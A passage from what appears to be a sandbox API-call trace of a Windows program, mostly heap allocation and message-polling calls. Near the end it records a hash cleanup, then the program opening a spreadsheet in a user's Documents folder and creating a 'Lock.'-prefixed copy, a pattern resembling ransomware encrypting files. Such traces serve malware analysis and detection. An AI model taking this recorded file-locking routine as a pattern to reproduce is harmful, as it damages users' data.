Flags=0x0, Size=0x4) returned 0x34a2140 [0261.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0261.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0261.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0261.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0261.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0261.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0261.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0261.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0261.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0261.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0261.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0261.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0261.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0261.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0261.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0261.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0261.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0261.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0261.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0261.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0261.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0261.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0261.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0261.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0261.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0261.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0261.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0261.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0261.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0261.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0261.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0261.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0261.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0261.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0261.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0261.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0261.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0261.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0261.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0261.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0261.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0261.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0261.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0261.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0261.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0261.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0261.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0261.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0261.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0261.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0261.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0261.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0261.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0261.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0261.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0261.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0261.301] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0261.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2120 [0261.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0261.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0261.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0261.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0261.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0261.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0261.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0261.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0261.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0261.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0261.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0261.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0261.303] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0261.303] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0261.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2120 [0261.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0261.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0261.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0261.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0261.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.305] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0261.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0261.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0261.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0261.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0261.306] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0261.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.306] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0261.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0261.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0261.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0261.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0261.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0261.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.307] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.307] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0261.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0261.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0261.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0261.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0261.308] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.308] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0261.308] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0261.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0261.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0261.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0261.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0261.308] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0261.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0261.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0261.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0261.309] CryptDestroyHash (hHash=0xaa59a0) returned 1 [0261.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0261.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0261.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0261.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0261.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0261.309] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0261.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.310] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0261.310] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.310] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.310] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0261.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0261.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0261.311] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/D3BEewSKP- XS.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\d3beewskp- xs.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0261.311] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0261.311] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0261.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0261.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0261.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0261.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0261.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0261.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0261.312] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0261.312] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.313] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0261.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0261.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0261.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.313] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0261.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0261.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0261.314] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.D3BEewSKP- XS.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.d3beewskp- xs.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0261.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0261.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0261.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0261.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0261.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0261.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 